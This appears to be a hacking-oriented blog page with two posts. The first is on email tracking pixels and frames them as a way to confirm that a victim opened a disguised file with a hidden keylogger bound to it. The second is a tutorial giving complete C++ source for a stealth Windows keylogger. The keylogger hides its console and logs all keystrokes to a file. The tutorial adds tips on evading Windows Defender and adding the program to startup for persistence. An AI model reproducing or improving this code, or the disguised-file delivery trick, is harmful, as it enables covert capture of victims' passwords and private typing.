Thursday, 31 August 2017

Email Tracking - Track your email to know if the receiver opened it, clicked on a link and much more..


Hello fellas, here you are going to learn about Email Tracking. Email tracking is a method used to obtain information from sent emails. For a smooth start, let me give you an example. Suppose that you are the attacker. You have created a file which is trustworthy by its name (let the file-name be "IDM Cracked Latest Version"). But along with this file, you did also bind (attach) an executable in background (hidden from user). This executable is nothing else but a keylogger. Hence, the file will seem useful to user but is really a spyware. Now, you mail this file to the victim and wait for him/her to open it. Here is the trap.

Most of email services doesn't provide a way for the sender to know if his/her email was seen by the receiver or just ignored. In WhatsApp, Facebook and any other messaging service, we can know if our message was read or ignored. But none of email service provide us with this feature. So if you sent a spyware file to victim, it will take for weeks to know if he/she downloaded the file or not. And your attack will be unsuccessful or it will give delayed result. This is a simple example where email tracking becomes handy. So that now we have seen the importance of Email Tracking, let us study the process in depth.

There are in general, two methods to obtain information from Emails.
  1. Email Tracing
  2. Email Tracking
Yes, Email Tracing is different from Email Tracking. To study the difference and learn what Email Tracing is, click here.. Both the procedures (Email tracing and tracking) are independent. Hence, you can directly study this article to learn tracking irrespective of studying email tracing. But I would still suggest you to go through email tracing at least once before continuing, as its an interesting and important topic.

What is Email Tracking?

To be technical, it’s a method for monitoring email delivery through the use of a digitally time-stamped record to show the exact time and date an email was opened. You send an email. Your victim opens it. You get a notification in the corner of your screen and have the time of the email being opened on record. Every time the email is opened or a link is clicked, you’ll know it happened.

There are mainly two kind of receipts required when an email is sent.
  1. Delivery Receipt - Indicates if the email is delivered or not. This receipt is provided in-built by all the email services.
  2. Read Receipt - Indicates if the email you sent is read by the receiver or just ignored. This service is not provided by most of email service providers. But we can still modify the service provider functions to get a read receipt.
Click to view full size image
And Email Tracking is a methodology of obtaining read receipts of any sent email. So now let us see the advantages of email tracking before knowing how it actually works.

How is Email Tracking useful?

Email Tracking is mainly used in two fields - Spying and Marketing. Initially, email and link tracking feels like spying on your customers or potential clients. However, nothing nefarious is happening. Using email tracking actually saves time and increases productivity for both you and the customer. When you see a notification you know your email has been opened. You no longer have to send the “did you get my email?” message unless they actually haven’t gotten it.

Also, you’ll know exactly when people are sitting down at their desks and has your business on their mind. If you reach out to them close to this time, you’ll save your client time by contacting them when they’ve already got your company on their mind. Instead of trying to get them at a random time on a random day, they’ll already be thinking about you, and less likely to be busy on something else. If you notice an email being opened multiple times, then you’ll know there’s a higher chance for engagement with them. You can tell if they’re checking information you sent them before or after a call/meeting.

Email tracking is great for:
  • Knowing when to follow up with people.
  • Providing specific information based on the feedback (For example: If they keep clicking an email about a certain product, you could send more information about it).
  • Helping marketing know what’s getting clients to click onward and what’s failing to get their attention.
  • Giving peace of mind that you’re getting to clients.
Now let us see how Email Tracking works.

How does Email Tracking work in general?

To understand email tracking, we must first know the importance of Web-beacon or Tracking-pixel. 
  • Web-beacon:A web beacon is an object embedded in a web page or email, which unobtrusively (usually invisibly) allows checking that a user has accessed the content. Common uses are email tracking and page tagging for web analytics.
  • Tracking-pixel: Tracking pixel is a type of Web-beacon. A tracking pixel is a transparent image, measuring one pixel by one pixel (very small). Once imbedded on a Web page or in an email, a tracking pixel connects to a PHP file stored on your Web server. Each time the tracking pixel is viewed, it pulls the PHP file from the server, creating a logged event that lets you know exactly when and for how many times customers accessed the page or opened the message.
Now that we know about tracking pixel, we can note two of its important properties - Its transparent and when it is accessed, the event is logged along with the date-and-time stamp in the log file. When you see the log file, you can tell about when and how many times the image was accessed.

Email Tracking works the same way. You need to imbed the tracking-pixel in the email. I used the word "Imded" and not "Embed". When you embed an image, the image loads in the email and is sent to the receiver as an attachment. Hence, the log file will store the time when the email was sent - as tracking-pixel was attached (accessed) when the email was created. But when you imbed an image, a html tag including the link (<img src="link">) to that image is sent in the email. Hence, the image is loaded when the receiver opens the email. So, the log file will save the time when the image was accessed by the receiver which indirectly indicates when email was seen by the receiver.

Limitations of Email Tracking Pixel

Typically, there are no limitations of Email Tracking Pixel but there are problems which occur due to following reasons:
  • The image isn’t loaded when an email is opened. Many web, desktop, and mobile email clients do not open images by default. Especially from unknown senders.
  • An ad or tracking blocker is being used. Several extensions exist that block email opens from being reported.
  • The image is loaded, but the email isn’t actually open. Some email clients render images as a preview, and will trigger email open false positives. The same effect is produced by Gmail's Image Caching feature.
  • Some enterprise security systems will block emails w/ open tracking pixels or tracked links. Worse than email tracking not working, your email just might not actually get through.
The above was a brief list of what can cause email tracking to fail. The most important of the above is Gmail's Image Caching feature. (I cannot mention about it here due to the limitations of size og my article but you can google it.)

Some of useful tools for Email Tracking

Email tracking can be done with the help of three methods - Manual Method, Web-browser Extensions and Online Tools. Manual method is a bit harder and lengthy so I will mention it in my upcoming articles. The extensions and tools are listed here:
If you know about other good tools, write the name and link in comments. Till then, stay connected.. Thank you..

Monday, 14 August 2017

Making a simple C++ Keylogger - Download with Source Code


Hello friends.. Today I am going to discuss here about the most awaiting post by our readers. You are going to learn about making a running and undetectable keylogger in C++ programming language. And you will be amazed to know that you don't need to have a complete knowledge of C++ to learn this thing. As I am here to explain you in detail what happens by execution of which code of line.

Still, there are some prerequisites to learn how to design a Keylogger and get the knowledge of different types of keylogger and how they work. You don't need to know the programming language but you still need to know how a keylogger really works in background and an algorithm to design it. Hence, before continuing your reading of this article, I recommend you to read the below to articles for ease. (Its because making a keylogger is not a child's task. You should have complete knowledge of it.)

Links:
After reading the above articles, you can easily move towards reading this article. In the first article i.e. steps to make a keylogger, you have learned about two things necessary in designing a keylogger. These two most important tasks are:
  1. You need to identify a function which identifies and triggers when a key is pressed.
  2. You need to code the keylogger to run in stealth (hidden) mode.
The first task is carried out by a function --GetAsyncKeyState()-- which is a part of windows API in C++. Hence, this function returns a specific value when the ASCII value of the character key pressed is passed as an argument. Now let us understand the making of a C++ Keylogger taking a closer look at its code.

C++ Keylogger Code:

#include<iostream>
#include<fstream>
using namespace std;     //used to avoid the compilation errors because of redefinition of variables.
#include<windows.h>
#include<winuser.h>


int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,SW_HIDE);
}

We will study three basic things in this piece of code:
  1. The working of GetAsyncKeyState() function.
  2. The working of user-defined Save() function.
  3. The working of user-defined Stealth() function.
You cannot copy this piece of code from my site. Hence, I have given a direct download link for this piece of code. Click here to download the Keylogger Source File.

Understanding: 

GetAsyncKeyState function: It is a Windows API function available in C++. It determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState. If the function succeeds, the return value specifies whether the key was pressed since the last call to GetAsyncKeyState, and whether the key is currently up or down. If the most significant bit is set, the key is down, and if the least significant bit is set, the key was pressed after the previous call to GetAsyncKeyState. 
  • GetAsyncKeyState function example:
    if(GetAsyncKeyState(VK_UP))
    {
    printf("The Up Arrow Has Been Pressed\n");
    }

Save function:The save function takes in the ASCII value of keystroke pressed as an argument. It then compares the value with each keystroke individually. If the comparison expression returns TRUE, it stores the keystroke pressed in a file with the help of a character variable. (One can also use Switch-Case instead of if-else ladder.)

Stealth function: Here is simple explanation of it.
HWND stealth;
Declares a window handle.
AllocConsole();
Allocates a new console for the calling process.
stealth = FindWindowA("ConsoleWindowClass", NULL);
Find the window handle with class name "ConsoleWindowClass".
ShowWindow(stealth,SW_HIDE);
Hide it.

Pros/Cons

Rather than mentioning the pros and cons here, I would like to simply mention the things this keylogger cannot do. The very first thing is, when you run this keylogger file, it will be easily detected by the Windows Defender. This is because of the file writing method we choose in this program. To avoid this, you can use the ofstream write("Filename.txt", ios::app) method to open a file in write mode rather than using file pointer method i.e, FILE *OUTPUT_FILE; OUTPUT_FILE = fopen(file, "a+"). Also, you need to change the function to write instead of fprintf. There is a small difference in its working but a master of C++ would find it easy.

Next thing this keylogger can't do is, it can't send you the log file via email. Its because, at the start of my article I mentioned Types of Keylogger. How you get the log file from victim's computer depends on the type of keylogger. And hence, it is not possible for me to code a keylogger each of one type. Still, one can add its code if you are a PRO coder!

The last thing you need to know is, you have to attach the executable file in startup. Else, everytime the victim restarts his/her laptop, this keylogger file will be removed from the main memory and hence it will stop functioning.

How to Stop the Keylogging activity

You might have thought that you know how to run this keylogger and record keystrokes. But ever thought how to stop it..! It is running in stealth mode i.e. it is not running in a window that you can close it simply by clicking on Close Button. The simplest way to stop this Keylogger is open the Task Manager and find the keylogger by is executable file name and end it process/task.

I hope you find this article interesting. Also I think you may be having several doubts related to this piece of code. Feel free to ask queries in the comment box and share this article with your friends and spread knowledge. Thank you..

Popular Posts